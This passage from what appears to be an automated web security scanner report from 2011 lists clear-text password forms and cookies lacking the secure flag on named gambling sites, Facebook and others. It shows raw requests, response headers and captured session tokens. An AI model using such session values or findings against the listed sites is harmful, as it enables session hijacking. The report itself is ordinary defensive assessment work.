<form name="aspnetForm" method="post" action="/extra/en/promotions/horse-racing/best-odds-guaranteed/Default.aspx" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_HeaderPlaceHolder_HeaderControl_Login_Go')" id="aspnetForm">
<div>
...[SNIP]...
ssword&quot;, 2);" OnFocus="PasswordBehaviour(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;, &quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword&quot;, 2);" /><input name="ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword" type="password" id="ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword" tabindex="3" class="textbox" OnBlur="PasswordBehaviour(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;, &quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword&quot;, 1);" /></div>
...[SNIP]...

6.14. http://www.bet365.com/extra/en/promotions/soccer/bore-draw-money-back

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bet365.com
Path:   /extra/en/promotions/soccer/bore-draw-money-back

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /extra/en/promotions/soccer/bore-draw-money-back HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:31:24 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 13:31:24 GMT; path=/
Set-Cookie: ASP.NET_SessionId=fufizjajowzlfy45sho150nb; path=/; HttpOnly
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:31:24 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:31:24 GMT; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:31:24 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 98594


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_Html" xmlns="http://www.w3.org/1999/xhtml">
<head id="
...[SNIP]...
<div id="pageContainer" style="float:none;">
<form name="aspnetForm" method="post" action="/extra/en/promotions/soccer/bore-draw-money-back/Default.aspx" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_HeaderPlaceHolder_HeaderControl_Login_Go')" id="aspnetForm">
<div>
...[SNIP]...
ssword&quot;, 2);" OnFocus="PasswordBehaviour(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;, &quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword&quot;, 2);" /><input name="ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword" type="password" id="ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword" tabindex="3" class="textbox" OnBlur="PasswordBehaviour(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;, &quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword&quot;, 1);" /></div>
...[SNIP]...

6.15. http://www.bet365.com/extra/en/promotions/soccer/soccer-accumulator-bonus

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bet365.com
Path:   /extra/en/promotions/soccer/soccer-accumulator-bonus

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /extra/en/promotions/soccer/soccer-accumulator-bonus HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:31:25 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 13:31:25 GMT; path=/
Set-Cookie: ASP.NET_SessionId=tv4wgmvkxivljf55azj5ogae; path=/; HttpOnly
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:31:25 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:31:25 GMT; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:31:25 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 113999


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_Html" xmlns="http://www.w3.org/1999/xhtml">
<head id="
...[SNIP]...
<div id="pageContainer" style="float:none;">
<form name="aspnetForm" method="post" action="/extra/en/promotions/soccer/soccer-accumulator-bonus/Default.aspx" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_HeaderPlaceHolder_HeaderControl_Login_Go')" id="aspnetForm">
<div>
...[SNIP]...
ssword&quot;, 2);" OnFocus="PasswordBehaviour(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;, &quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword&quot;, 2);" /><input name="ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword" type="password" id="ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword" tabindex="3" class="textbox" OnBlur="PasswordBehaviour(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;, &quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword&quot;, 1);" /></div>
...[SNIP]...

6.16. http://www.crazyrewards.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.crazyrewards.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.crazyrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Tue, 15 Mar 2011 14:28:31 GMT
Accept-Ranges: bytes
ETag: "c0c41421de3cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:20:05 GMT
Connection: close
Content-Length: 11218

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta name="robots" con
...[SNIP]...
<div id="loginbox">
       <form method="post" action="http://partners.crazyrewards.com/login.asp" id="form1" name="form1" target="_blank">
       <table border="0" width="266" >
...[SNIP]...
<input class="input-login" type="text" name="username" value="username" onfocus="if(this.value=='username')this.value='';"/>
   <input class="input-login" type="password" name="password" value="password" onfocus="if(this.value=='password')this.value='';"/>
</td>
...[SNIP]...

6.17. http://www.facebook.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=OxnRTfED2OUFMXxmZkOCiFGO; expires=Wed, 15-May-2013 12:31:55 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=szS-2; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.116.65
Connection: close
Date: Mon, 16 May 2011 12:31:55 GMT
Content-Length: 29704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="reg_box"><form method="post" id="reg" name="reg" onsubmit="return function(event)&#123;return false;&#125;.call(this,event)!==false &amp;&amp; Event.__inlineSubmit(this,event)"><input type="hidden" autocomplete="off" name="post_form_id" value="0c8389686ea405c1f0d6cb61733a30bf" />
...[SNIP]...
<div class="field_container"><input type="password" class="inputtext" id="reg_passwd__" name="reg_passwd__" value="" /></div>
...[SNIP]...

6.18. http://www.heavenaffiliates.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.heavenaffiliates.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.heavenaffiliates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:02:32 GMT
Server: Apache FrontPage/5.0.2.2635 mod_bwlimited/1.4 mod_auth_passthrough/2.1
X-Powered-By: PHP/5.2.15
X-Pingback: http://www.heavenaffiliates.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20304

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title> He
...[SNIP]...
</h2>
                       <form action="http://affiliates.heavenaffiliates.com/login_cust.asp" method="post">
                           <fieldset>
...[SNIP]...
</label>
                                   <input type="password" name="password" class="input" />
                               </p>
...[SNIP]...

6.19. http://www.postcodelottery.com/MyAccount.htm

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.postcodelottery.com
Path:   /MyAccount.htm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /MyAccount.htm HTTP/1.1
Host: www.postcodelottery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=91262363.1305546112.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BALANCEID=balancer.route1; __utma=91262363.1689585513.1305546112.1305546112.1305546112.1; __utmc=91262363; __utmb=91262363.1.10.1305546112;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:22:36 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 12:22:36 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Content-Type: text/html;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Connection: close
Content-Length: 16408

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
               <link rel="short
...[SNIP]...
</script>
           <form action="/web/form" name="f91519f" id="f91519f" method="post" enctype="multipart/form-data"><fieldset style="display:none" >
...[SNIP]...
</label>
                       <input type="password" class="text " id="password" name="f90908" size="20" maxlength="250" value="" />
                   
               </div>
...[SNIP]...

6.20. http://www.tstglobal.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tstglobal.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.tstglobal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:32:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 16 May 2011 12:32:05 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10181

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-EN" lang="en-EN">

<head>
   <title
...[SNIP]...
</h2>
<form action="http://members.tstglobal.com/login.php" method="post">
       <input type="hidden" name="Submit" value="1">
...[SNIP]...
</label>
<input type="password" name="login-password" id="login-password" value="" />

<input type="image" src="/assets/images/interface/button-login.gif" id="login-submit" alt="Login" />
...[SNIP]...

7. SSL cookie without secure flag set
There are 24 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


7.1. https://bingo.betsson.com/en/

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://bingo.betsson.com
Path:   /en/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/ HTTP/1.1
Host: bingo.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:58:51 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:58:51 GMT; path=/
Set-Cookie: ASP.NET_SessionId=bjkl3qyxamknq4451yotmo55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:58:51 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:58:51 GMT; path=/
Set-Cookie: ASP.NET_SessionId=bjkl3qyxamknq4451yotmo55; path=/; HttpOnly
Set-Cookie: currentSite=1; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:58:51 GMT
Connection: close
Content-Length: 63913


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...

7.2. https://help.betsson.com/display/4/kb/faq/index.aspx

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://help.betsson.com
Path:   /display/4/kb/faq/index.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /display/4/kb/faq/index.aspx HTTP/1.1
Host: help.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Connection: close
Date: Mon, 16 May 2011 12:02:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: /index.aspx
Set-Cookie: ASP.NET_SessionId=qiv3sin4m5umjyaekpf4yp55; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 128

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='/index.aspx'>here</a>.</h2>
</body></html>

7.3. https://members.bet365.com/members/chat/

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://members.bet365.com
Path:   /members/chat/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /members/chat/ HTTP/1.1
Host: members.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:34:01 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
p3p: CP="CAO PSA OUR"
p3p: CP="CAO PSA OUR"
Set-Cookie: session=processform=0&stk=3E2ADB785CD3460089FF610915493B5F000002; path=/
Set-Cookie: stk=3E2ADB785CD3460089FF610915493B5F000002; path=/
Set-Cookie: aps03=lng=1&tzi=1; expires=Sun, 16-May-2021 12:34:01 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16269


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   bet365
</
...[SNIP]...

7.4. https://poker.betsson.com/en/

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://poker.betsson.com
Path:   /en/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/ HTTP/1.1
Host: poker.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=d2twxznhgovrix45ynqrh1a1; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=d2twxznhgovrix45ynqrh1a1; path=/; HttpOnly
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:13:27 GMT
Connection: close
Content-Length: 39393


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...

7.5. https://scratch.betsson.com/en/

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://scratch.betsson.com
Path:   /en/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/?navbar=true HTTP/1.1
Host: scratch.betsson.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:45:00 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:45:00 GMT; path=/
Set-Cookie: ASP.NET_SessionId=u41q3c55gc42at45o0pmid55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:45:00 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:45:00 GMT; path=/
Set-Cookie: ASP.NET_SessionId=u41q3c55gc42at45o0pmid55; path=/; HttpOnly
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:45:00 GMT
Content-Length: 160229


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...

7.6. https://secure.neogames-tech.com/ScratchCards/Lobby.aspx

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.neogames-tech.com
Path:   /ScratchCards/Lobby.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ScratchCards/Lobby.aspx HTTP/1.1
Host: secure.neogames-tech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:31:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=2vrbnn55eaea4a45yqh5ecex; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 19307


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
       </title>
       <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1" />
       <meta name="ProgId"
...[SNIP]...

7.7. https://www.betsson.com/en/about/

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.betsson.com
Path:   /en/about/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/about/ HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Location: http://about.betsson.com/en/
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Tue, 15-May-2012 23:00:00 GMT; path=/
Set-Cookie: site=en; expires=Tue, 15-May-2012 23:00:00 GMT; domain=.betsson.com; path=/
Set-Cookie: ASPSESSIONIDAQQDRSDT=OIEEAKPDPIECBJMMIOMNPPEC; path=/
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:08:43 GMT
Connection: close
Set-Cookie: BIGipServerwww.betsson.com=699339180.20480.0000; path=/


7.8. https://www.betsson.com/en/about/company-information/payments-and-security/index.asp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.betsson.com
Path:   /en/about/company-information/payments-and-security/index.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/about/company-information/payments-and-security/index.asp HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Location: http://about.betsson.com/en/licenses-and-security/
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Tue, 15-May-2012 23:00:00 GMT; path=/
Set-Cookie: site=en; expires=Tue, 15-May-2012 23:00:00 GMT; domain=.betsson.com; path=/
Set-Cookie: ASPSESSIONIDAASDBABS=KDMLJIPDPDOMNHLOJJMHPKKA; path=/
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:08:49 GMT
Connection: close
Set-Cookie: BIGipServerwww.betsson.com=682561964.20480.0000; path=/


7.9. https://www.betsson.com/en/customer-service/

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.betsson.com
Path:   /en/customer-service/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/customer-service/ HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23563
Content-Type: text/html; Charset=UTF-8
Server: Microsoft-IIS/7.5
Set-Cookie: lggdnstt=0; path=/
Set-Cookie: section=customer; expires=Mon, 14-May-2012 23:00:00 GMT; path=/en
Set-Cookie: language=en; expires=Tue, 15-May-2012 23:00:00 GMT; path=/
Set-Cookie: site=en; expires=Tue, 15-May-2012 23:00:00 GMT; domain=.betsson.com; path=/
Set-Cookie: ASPSESSIONIDAASDBABS=IAMLJIPDMACCCMGFMONHJNKI; path=/
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:08:39 GMT
Connection: close
Set-Cookie: BIGipServerwww.betsson.com=682561964.20480.0000; path=/
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-
...[SNIP]...

7.10. https://www.betsson.com/en/customer-service/forgotten-password/

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.betsson.com
Path:   /en/customer-service/forgotten-password/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/customer-service/forgotten-password/ HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 13183
Content-Type: text/html; Charset=UTF-8
Server: Microsoft-IIS/7.5
Set-Cookie: lggdnstt=0; path=/
Set-Cookie: section=customer; expires=Mon, 14-May-2012 23:00:00 GMT; path=/en
Set-Cookie: language=en; expires=Tue, 15-May-2012 23:00:00 GMT; path=/
Set-Cookie: site=en; expires=Tue, 15-May-2012 23:00:00 GMT; domain=.betsson.com; path=/
Set-Cookie: ASPSESSIONIDAQQDRSDT=KIEEAKPDAIGMFJDJEJFFOHCB; path=/
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:08:39 GMT
Connection: close
Set-Cookie: BIGipServerwww.betsson.com=699339180.20480.0000; path=/
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-
...[SNIP]...

7.11. https://www.betsson.com/en/customer-service/privacy-statement/

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.betsson.com
Path:   /en/customer-service/privacy-statement/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/customer-service/privacy-statement/ HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16611
Content-Type: text/html; Charset=UTF-8
Server: Microsoft-IIS/7.5
Set-Cookie: lggdnstt=0; path=/
Set-Cookie: section=customer; expires=Mon, 14-May-2012 23:00:00 GMT; path=/en
Set-Cookie: language=en; expires=Tue, 15-May-2012 23:00:00 GMT; path=/
Set-Cookie: site=en; expires=Tue, 15-May-2012 23:00:00 GMT; domain=.betsson.com; path=/
Set-Cookie: ASPSESSIONIDAASDBABS=EBMLJIPDHIKKMCGJMGGHLPPD; path=/
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
